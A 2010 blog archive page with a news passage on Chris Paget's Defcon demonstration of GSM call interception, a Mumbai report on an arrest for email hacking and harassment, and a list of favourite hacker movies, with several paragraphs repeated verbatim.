“GSM is broken — it’s just plain broken,” he said. GSM is considered 2G, or “second generation,” cellular technology. Phones that run on the newer 3G and 4G standards aren’t vulnerable to his attack.
If you’re using an iPhone or any other smart phone and the screen shows that your call is going over a 3G network, for example, you are protected. Blackberry phones apply encryption to calls that foil the attack, Paget pointed out.
But if you’re using a type of phone that doesn’t specify which type of network it uses, those phones are often vulnerable, Paget said. Paget’s device tricks nearby cell phones into believing it is a legitimate cell phone tower and routing their calls through it.
The attack Chris Paget showed illustrates weaknesses in GSM, one of the world’s most widely-used cellular communications technologies. His attack was benign; he showed how he could intercept a few dozen calls made by fellow hackers in the audience for his talk at the Defcon conference here.
But it illustrates that criminals could do the same thing for malicious purposes, and that consumers have few options for protecting themselves.
Paget said he hopes his research helps spur adoption of newer communications standards that are more secure.
“GSM is broken — it’s just plain broken,” he said. GSM is considered 2G, or “second generation,” cellular technology. Phones that run on the newer 3G and 4G standards aren’t vulnerable to his attack.
If you’re using an iPhone or any other smart phone and the screen shows that your call is going over a 3G network, for example, you are protected. Blackberry phones apply encryption to calls that foil the attack, Paget pointed out.
But if you’re using a type of phone that doesn’t specify which type of network it uses, those phones are often vulnerable, Paget said. Paget’s device tricks nearby cell phones into believing it is a legitimate cell phone tower and routing their calls through it.
Man arrested for mailing ex-colleague’s ‘lewd’ pics Mumbai:
Mumbai: The cyber crime cell of Mumbai police on Wednesday arrested a 23-yearold executive working for a multinational company in Andheri for allegedly hacking into his ex-colleague’s email ID and sending morphed obscene pictures of her to her friends.
The accused, Prashant Vilas Desai, was arrested after the police tracked down the IP address to his laptop. “We have booked Desai on charges of cheating, breach of trust and Sections of the Information Technology Act. He has been remanded in police custody,’’ said a cyber crime cell official.
The 22-year-old victim worked as an administrative assistant with the same company where Desai was employed. Desai was attracted to her. Though she treated him like a friend, Desai mistook her actions and approached her parents with a marriage proposal, the official added.
The victim’s parents turned his proposal down. Soon after, he allegedly started stalking her. He would call her repeatedly and send her emails. “She left that organization and joined another company as sales coordinator. On May 26, Desai called her mother up and told her that she was sending him emails expressing her love for him. Later, he even showed her mother printouts. The victim’s mother told her to close the email account and start a fresh one,’’ the officer said.
“On June 21, some of her friends informed the victim that someone had sent obscene pictures of her from her email, giving out her details and phone number. When the victim logged into her account, she was shocked to see the emails,’’ the officer said.
The accused, Prashant Vilas Desai, was arrested after the police tracked down the IP address to his laptop. “We have booked Desai on charges of cheating, breach of trust and Sections of the Information Technology Act. He has been remanded in police custody,’’ said a cyber crime cell official.
The 22-year-old victim worked as an administrative assistant with the same company where Desai was employed. Desai was attracted to her. Though she treated him like a friend, Desai mistook her actions and approached her parents with a marriage proposal, the official added.
The victim’s parents turned his proposal down. Soon after, he allegedly started stalking her. He would call her repeatedly and send her emails. “She left that organization and joined another company as sales coordinator. On May 26, Desai called her mother up and told her that she was sending him emails expressing her love for him. Later, he even showed her mother printouts. The victim’s mother told her to close the email account and start a fresh one,’’ the officer said.
“On June 21, some of her friends informed the victim that someone had sent obscene pictures of her from her email, giving out her details and phone number. When the victim logged into her account, she was shocked to see the emails,’’ the officer said.
Sunday, November 7, 2010
Friday, November 5, 2010
My Favorite Hacker Movies
Hacker living in Russia, gets tied into the mafia.
Takedown
Avoid at all cost. It's a piss poor movie and full of lies. Look up "Freedom Downtime", a documentary on the 'Free Kevin' movement. You'll quickly understand.
Untraceable
quite a talented hackers movie......... thrilling. also shows the ways of FBI cybercrime tracking the target site
Serial Experiments: Lane
13 part japanese anime series made for T.V. More about philosophy and conspiracy theory than hacking, but everything revolves around computers and the internet
Code Hunter
Low budget flick with hacking, VR and AI. Preposterous but still enjoyable.
Die Hard 4
This very good Hacking Based movi.I am very impressed this movi and i want also became hacker
Cloak and Dagger
A classic! I watched this several times as a kid. War Games is still number 1 though.http://www.blogger.com/img/blank.gif
The Bourne Ultimatum
The CIA needs to hack the mail server of a newspaper (The Guardian UK) to read the email of a reporter they assassinated. So they turn to Nmap and Zenmap GUI to hack the mail server.
The Girl with the Dragon Tattoo
Based on the internationally bestselling novel by Stieg Larsson, this film follows Lisabeth, a troubled young hacker suffering from Asperger syndrome and a history of abuse by authority figures, as she works with a journalist trying to solve a 40-year old murder mystery.
Khottabych
A teenage hacker (Gena) uses Nmap and Telnet to deface microsoft.com. Microsoft and the US authorities are understandably upset by the attack, so they send the attractive female hacker Annie to flush him out. The movie also features an epic battle between powerful genies (the kind which come in a bottle) fighting for dominion over Earth.
The Listening
A former NSA officer who defects and mounts a clandestine counter-listening station high in the Italian Alps. Nmap and NmapFE can be seen in action.
Battle Royale
One of the students is a hacker, and can be seen referencing Nmap source code.
Hackers
Perhaps this is not a good movie if you're a real hacker but personally i thought it was awesome!
Cypher
I suppose I would add the movie Cypher as a notable mention. It's a decent sci-fi flick with what was supposed to be The Matrix influences. No hacking per see, except loading virii.
Takedown
Avoid at all cost. It's a piss poor movie and full of lies. Look up "Freedom Downtime", a documentary on the 'Free Kevin' movement. You'll quickly understand.
Untraceable
quite a talented hackers movie......... thrilling. also shows the ways of FBI cybercrime tracking the target site
Serial Experiments: Lane
13 part japanese anime series made for T.V. More about philosophy and conspiracy theory than hacking, but everything revolves around computers and the internet
Code Hunter
Low budget flick with hacking, VR and AI. Preposterous but still enjoyable.
Die Hard 4
This very good Hacking Based movi.I am very impressed this movi and i want also became hacker
Cloak and Dagger
A classic! I watched this several times as a kid. War Games is still number 1 though.http://www.blogger.com/img/blank.gif
The Bourne Ultimatum
The CIA needs to hack the mail server of a newspaper (The Guardian UK) to read the email of a reporter they assassinated. So they turn to Nmap and Zenmap GUI to hack the mail server.
The Girl with the Dragon Tattoo
Based on the internationally bestselling novel by Stieg Larsson, this film follows Lisabeth, a troubled young hacker suffering from Asperger syndrome and a history of abuse by authority figures, as she works with a journalist trying to solve a 40-year old murder mystery.
Khottabych
A teenage hacker (Gena) uses Nmap and Telnet to deface microsoft.com. Microsoft and the US authorities are understandably upset by the attack, so they send the attractive female hacker Annie to flush him out. The movie also features an epic battle between powerful genies (the kind which come in a bottle) fighting for dominion over Earth.
The Listening
A former NSA officer who defects and mounts a clandestine counter-listening station high in the Italian Alps. Nmap and NmapFE can be seen in action.
Battle Royale
One of the students is a hacker, and can be seen referencing Nmap source code.
Hackers
Perhaps this is not a good movie if you're a real hacker but personally i thought it was awesome!
Cypher
I suppose I would add the movie Cypher as a notable mention. It's a decent sci-fi flick with what was supposed to be The Matrix influences. No hacking per see, except loading virii.
Tuesday, November 2, 2010
Subscribe to:
Posts (Atom)